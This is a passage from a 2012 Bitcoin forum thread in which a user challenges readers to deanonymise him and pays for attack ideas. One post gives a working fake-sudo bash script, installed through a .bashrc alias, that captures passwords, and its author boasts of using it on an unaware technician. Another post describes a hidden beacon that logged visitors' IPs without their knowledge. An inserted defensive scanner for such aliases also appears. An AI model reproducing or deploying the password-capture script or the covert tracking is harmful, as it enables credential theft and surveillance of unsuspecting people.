Bitcoin Forum
Author Topic: [joe is dead] http://findmeifyoucan.eu  (Read 7043 times)
OpenYourEyes
October 28, 2012, 04:39:36 PM
 #61

You seem to have most things covered; but, the more complex you make the chain, the easier it is to slip up and forget/misconfigure something.
Everything we're talking about here is what I'm specialising in at University at the moment: digital & anti forensics/security.

OpenYourEyes, I'd like to reward your effort if you give me an address, I will.

:) Thanks.
1HUnQSAEto29XC5PeHUbaWkPUhec7W7DJN

I'm off to grab a bite to eat; I'll rack my brains when I come back to see what else can be done/is being missed. Hopefully we can get even more input from people on this as well.

OpenYourEyes
October 28, 2012, 04:49:28 PM
 #62

What's to stop the hacker from spoofing the DNS record for tormail, SR, etc and sending you to another server?

This is exactly what I was going to do if he gave us (or I managed to get) access to his server. He's using Linux so this doesn't apply, but some commonly installed Windows applications check for updates without forcing the use of https. It isn't too hard to trick the software into running your own "update" which would give you pretty much unrestricted access to do whatever you like on the victims machine.
I've done things like that in the past, but as you say he's using linux (debian, so nmap says) so its package manager will check the signature of all packages.

Here's something else which I was intending to do:

If he's using bash, then create an alias within .bash_rc, and link sudo calls to a simple password capturing script.
e.g.
within .bash_rc:
alias sudo="passwordCapture.sh"

Now any time sudo is called (e.g. sudo apt-get update); sudo calls the following 'fake sudo' script which logs the password to a file, tells the user it is wrong, and calls the legit sudo program with the arguments originally passed.

Quote
#!/bin/bash
stty -echo
read -p "[sudo] password for $(whoami): " passw; echo
stty echo
echo $passw >> password.txt
echo "Sorry, try again."
echo "sudo $*" | sh


I did this many years ago to my old IT technician, but made the script more fancy by deleting any references once it had completed: he was none the wiser.

--
Thanks joe23, got your transfer.

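A defensive check for the alias trick described in post #62, added here as an example and not code from any poster in the thread: it scans a home directory's bash startup files for alias or function definitions that shadow privilege-related commands. The function names, the watched-command list and the list of startup files are assumptions made for the example.

```shell
#!/usr/bin/env bash
# Added example: flag bash startup files that redefine privilege-related
# commands through an alias or a shell function (e.g. alias sudo="...").

# Commands whose redefinition deserves review (assumed list, extend as needed).
WATCHED='sudo|su|ssh|passwd|doas'

# Startup files bash may read for a user (interactive and login shells).
RC_FILES='.bashrc .bash_profile .bash_login .profile .bash_aliases'

# scan_rc FILE...
# Prints "file:line:text" for each definition that shadows a watched command.
# Commented-out lines are ignored because the match is anchored at line start.
scan_rc() {
    for _f in "$@"; do
        [ -r "$_f" ] || continue
        grep -nHE "^[[:space:]]*(alias[[:space:]]+(.*[[:space:]])?($WATCHED)=|function[[:space:]]+($WATCHED)([[:space:]{(]|\$)|($WATCHED)[[:space:]]*\(\))" "$_f" || true
    done
    return 0
}

# scan_home DIR
# Runs scan_rc over every known startup file under DIR.
scan_home() {
    for _name in $RC_FILES; do
        scan_rc "$1/$_name"
    done
}

# Usage: scan_home "$HOME"
# Any output is a finding: compare it with `type -a sudo` in a fresh shell
# and with the account owner's intent before typing a password there.
```

An empty result only covers these files; system-wide files such as /etc/bash.bashrc and directories prepended to PATH need their own review.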
joe23 (OP)
October 28, 2012, 04:54:01 PM
 #63

You seem to have most things covered; but, the more complex you make the chain, the easier it is to slip up and forget/misconfigure something.
Everything we're talking about here is what I'm specialising in at University at the moment: digital & anti forensics/security.

cool.

sent a little bit to your address as can be seen in this updated screenshot of joe's wallet:
(I had to use the VPS proxy to upload it, imgur disallows tor)

https://i.imgur.com/fJdtu.png

OOOPS! I accidentally had Electrum's connection setup dialog open when I took the screenshot.
Blazr
October 28, 2012, 04:57:54 PM
 #64

Problem is I need a non-tor exit point somewhere for bitcointalk.org. Any other ideas on how to post to bitcointalk?

If I remember correctly, only signing up using TOR is banned, you can actually login and post using TOR no problem.

joe23 (OP)
October 28, 2012, 05:04:24 PM
 #65

Problem is I need a non-tor exit point somewhere for bitcointalk.org. Any other ideas on how to post to bitcointalk?

If I remember correctly, only signing up using TOR is banned, you can actually login and post using TOR no problem.

Ah, good to know.

I think you also deserve some payment for your effort if you share an address. I hope I didn't miss anyone else? afaik I so far gave some monetary incentives to:

  • MysteryMiner
  • Jasinlee
  • Openyoureyes
AndrewBUD
October 28, 2012, 05:12:47 PM
 #66

Curious if Theymos has a sign up IP which is different than the current IP used...




joe23 (OP)
October 28, 2012, 05:36:48 PM
 #67

Curious if Theymos has a sign up IP which is different than the current IP used...

Maybe he's open to helping you guys by releasing any info he has on joe23 (with my consent)?

So if you ask him and he's ok with it, I will give him my consent to publish anything he has on me in this thread.
OpenYourEyes
October 28, 2012, 06:36:22 PM
Last edit: October 28, 2012, 10:09:37 PM by OpenYourEyes
 #68

-

Nite69
October 28, 2012, 07:55:49 PM
 #69


I use


  #> ssh -D 0.0.0.0:55555 joe23@188.165.73.235 -o ProxyCommand="~/bin/connect -4 -S localhost:9050 %h %p"


to ssh to the VPS and at the same time setup the proxy, which I connect to using


Would it be safe to add -X to the ssh command and then run firefox (or other browser, bitcoin client etc) on the VPS (or rent another VPS) to do all Joe's jobs? Also, would it be more secure to use a certificate on a smartcard for the connection, not passwords?

SysRun
October 28, 2012, 07:56:24 PM
 #70

wow, this bounty keeps climbing, huh?

jasinlee
October 28, 2012, 08:01:23 PM
 #71

If you are going to pull a heist, it's good to know you're prepared :P

flatfly
October 28, 2012, 08:07:32 PM
 #72

You seem to have most things covered; but, the more complex you make the chain, the easier it is to slip up and forget/misconfigure something.
Everything we're talking about here is what I'm specialising in at University at the moment: digital & anti forensics/security.

cool.

sent a little bit to your address as can be seen in this updated screenshot of joe's wallet:
(I had to use the VPS proxy to upload it, imgur disallows tor)



OOOPS! I accidentally had Electrum's connection setup dialog open when I took the screenshot.

Increase your Electrum anonymity by connecting to a Tor *hidden* service rather than
a regular server. This helps prevent server operators from connecting some dots... :)

More info:
https://bitcointalk.org/index.php?topic=113116.0
Nite69
October 28, 2012, 08:20:28 PM
 #73

theymos is pissed at me and releases my PMs publicly.

In those PMs you can see me asking MysteryMiner whether he was one of the german guys wearing masks at the Conference in London.



Can we assume he was in that conference? Maybe he is in one of the videos here: http://bitcoin2012.com/

cheebydi
October 28, 2012, 08:26:49 PM
 #74

As this thread is highly informative and entertaining I'd like to add 1 BTC to the bounty.

Joe23 please provide me with an address or an escrow where I can send it.

joe23 (OP)
October 28, 2012, 08:56:21 PM
 #75

As this thread is highly informative and entertaining I'd like to add 1 BTC to the bounty.

Joe23 please provide me with an address or an escrow where I can send it.



Awesome!

I could give you an address from joe's wallet, but would prefer someone to do escrow for us.
joe23 (OP)
October 28, 2012, 09:06:52 PM
 #76

ok guys and girls, where to go from here?

It seems to me I'm pretty safe for now, right? Many possible flaws and improvements have been pointed out but none of them lead to you guys getting close to me.

That bitcointalk-posting-time-attack seems hard to pull off and will likely take weeks to deliver meaningful data.

I pretty much decided to "have the VPS compromised" at some point, but I think I should wait with that since it could be over pretty quickly after that and I must say I'm quite enjoying this and learning a lot.

So maybe I should try to do some more stuff that might endanger my anonymity to make it more interesting? Like pop up on irc and chat with you guys or something.

Open for any suggestions that don't involve me actually doing anything illegal.

Here's your chance to set up some trap ;)
OpenYourEyes
October 28, 2012, 09:32:07 PM
Last edit: October 28, 2012, 10:09:13 PM by OpenYourEyes
 #77

Is your IP at all 24.143.xx.xx or 217.114.xx.xx (xx'd for privacy), or are you Smoothie, or someguy123? (Took a few stabs there).

I'm in the process of doing an explanation for my results.

My original intention was to try and use Flash to log your true IP:
Plugins such as Adobe Flash don't normally respect your browser's proxy settings (this must have changed recently, or I went about it the wrong way because it didn't work).

My post above contained a tracking beacon which was logging IPs & useragents; the link in my post went to a free hosting provider which I set up using a manner of techniques to log information about visitors (using JavaScript, PHP, and an embedded flash player which was requesting a video from my server), and then after a few seconds forwarded you to a legit blog post.
The Flash player method is the one I was relying on the most (the others were just a fallback in case you messed up somewhere - apparently not), but it doesn't seem to have worked.
Although, sifting through nearly 60 different IPs and browser information, and then doing lookups on them is quite cumbersome.

I had one visitor come to the site which was using a TOR connection (195.177.253.113), I took a stab in the dark in believing it was you. I know you use Linux, and the useragent matches up. Doing searches on this useragent from the last couple of days led me to two members here: Smoothie, and someguy123: quite confident it's not you though.

This IP (217.114.xx.xx) got me slightly excited as it originates from Dublin, and your server IP also gave references to Dublin. Plus, the useragent seems to be one of Ubuntu. I'm just linking random data here together, but there is not much else to go on.

I got suspicious with this IP (24.143.xx.xx) as one moment the data originated from a Windows box, but minutes later it was a Ubuntu one.

And finally, these two (85.127.xx.xx, 81.246.xx.xx) visited the website three times in total, all within 30 seconds of each other. Not implying these are you, but strange behaviour was noted in my logs.

fergalish
October 28, 2012, 10:02:34 PM
 #78

This is a great thread. If I had to make a suggestion, I would connect to some translation service over tor, translate what you want to write into some other language, then translate back to English, then post it (better would be to install a local translator). Your English is almost perfect - definitely better than any automatic translation - but that only narrows it down to, oh, maybe 400 million native English speakers. The few mistakes I noticed could either be genuine typos, or maybe deliberate. If I wanted to try, I'd ask you a question which requires an answer with a word such as "randomi(s/z)e" or "trunk/boot" (US & UK respectively for those with English as 2nd language). I just can't think of a suitable question right now.

To connect, I would use TAILS. It sets up two virtual machines within an OS running from a USB drive - one of the vm's runs a TOR server, the other vm's network card is routed through that TOR instance. The user interacts only with the 2nd so no need to worry about DNS, java, flash leaks etc - except if something breaks the vm enclosure I suppose. I haven't tried it out, but it seems really good.

Someone suggested running firefox through x11 forwarding in the torified ssh tunnel. I'd have to say that'd be really slow. You might get away with w3m or lynx maybe, but that might narrow you down even more - how many text-based browser users can there still be in the world?
theymos
October 28, 2012, 10:05:23 PM
 #79

So if you ask him and he's ok with it, I will give him my consent to publish anything he has on me in this thread.

joe23@tormail.org
188.165.73.235
Ignores BitcoinINV

1NXYoJ5xU91Jp83XfVMHwwTUyZFK64BoAD
fergalish
October 28, 2012, 10:25:15 PM
 #80

My post above contained a tracking beacon which was logging IPs & useragents; the link in my post went to a free hosting provider which I set up using a manner of techniques to log information about visitors (using JavaScript, PHP, and an embedded flash player which was requesting a video from my server), and then after a few seconds forwarded you to a legit blog post.
Fascinating! How can you possibly embed such code in a forum post? Surely this indicates a serious bug in SMF, the forum software?

One of the IP addresses you mention is mine, and I'm not joe23. Thanks for doing the xx.xx'ing - I'd hate to have a bunch of you guys suddenly trying to hack my box!